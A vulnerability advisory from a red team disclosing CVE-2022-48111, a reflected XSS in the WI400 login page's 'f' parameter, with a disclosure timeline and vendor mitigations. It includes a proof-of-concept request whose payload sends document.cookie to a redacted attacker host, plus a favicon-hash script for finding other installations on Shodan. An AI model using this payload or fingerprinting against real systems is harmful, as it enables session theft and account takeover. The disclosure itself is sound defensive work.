SIRI WI400: XSS on Login Page – CVE-2022-48111Ylabs
Advisory – CVE-2022-48111
A cross-site scripting (XSS) vulnerability in the check_login function of S.I.R.I. s.r.l WI400 between v.8 and v.11 included allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the “f” parameter.
During a black-box penetration test activity carried out on the WI400 v9.5 emerged the possibility to reflect some parameters in the server response. By further investigating the matter, it was found out that the login page was vulnerable to reflected cross-site scripting attacks. Once confirmed, it was possible to exfiltrate the session cookie. In a likely scenario an attacker could, for example, steal it by means such as a phishing attack and log into the system impersonating the victim.
The following is a POC snippet of the request with the payload used to verify and confirm the above mentioned vulnerability.
GET /WI400/index.php?t=CHECK_LOGIN&f=";const+req+%3d+new+XMLHttpRequest()%3breq.open("GET",+"https%3a//[REDACTED]/"%2bdocument.cookie)%3breq.send();var+tail="y HTTP/1.1 Host: [REDACTED] Cookie: PHPSESSID=o7p2j3i1a14sb1fp8e1s1hhuv7 […]
HTTP/1.1 200 200 […] <!DOCTYPE html> […] var FOCUSED_FIELD = ""; var FOCUSED_TAB =""; var REFRESH_FOCUS = false; var __WI400_HMAC = ""; var __WI400_SESSION = ""; var CURRENT_ACTION = "CHECK_LOGIN"; var CURRENT_FORM = "";const req = new XMLHttpRequest();req.open("GET", "https://[REDACTED]/"+document.cookie);req.send();var tail="y"; […]
In fact, as one can see in the picture below, the code executes on the target and the user session cookie is successfully exfiltrated to the “attacker” server.
In order to exploit the vulnerability no authentication is necessary.
To understand if other versions of the software were subsceptible to the same kind of vulnerability, we needed to find other installations of the same.
To do so, we used a pretty nifty trick. We calculated tha favicon hash with this python script:
import mmh3 import requests import codecs response = requests.get('https://[REDACTED]/favicon.ico') favicon = codecs.encode(response.content,"base64") hash = mmh3.hash(favicon) print(hash)
and then we looked it up on Shodan with the following query:
After comparing the codebase in the new found installations with the one we were testing, we were able to confirm that multiple versions of the software were vulnerable to the same XSS. We then proceeded to notify the vendor of our findings.
The vendor promptly aknowledged the problem and has been working with Yarix fully cooperating since the early stages to fix it.
If your version of the WI400 software is included between 8 and 11 you can choose one of the following:
- Enable the “safe mode” that can be activated on request by SIRI since v.8
- Update the software to the latest release
Resolutions from SIRI
We recommend all our customers to activate the “safe mode”. In future releases the parameter will be enabled by default and cannot be disabled. Contact the help desk at email@example.com for further information.
- 14/12/2022 – Initial contact with SIRI
- 16/12/2022 – SIRI acknowledges the problem and decides to work with Yarix for a coordinated disclosure
- 02/02/2023 – MITRE assigned CVE-2022-48111 to the vulnerability
- 02/03/2023 – Full disclosure
Resources & References
Alessandro Albani is a member of the Yarix Red Team. He is passionate about technology, music and vintage vehicles. If it has some circuitry, makes sounds or has an engine he is probably interested in it.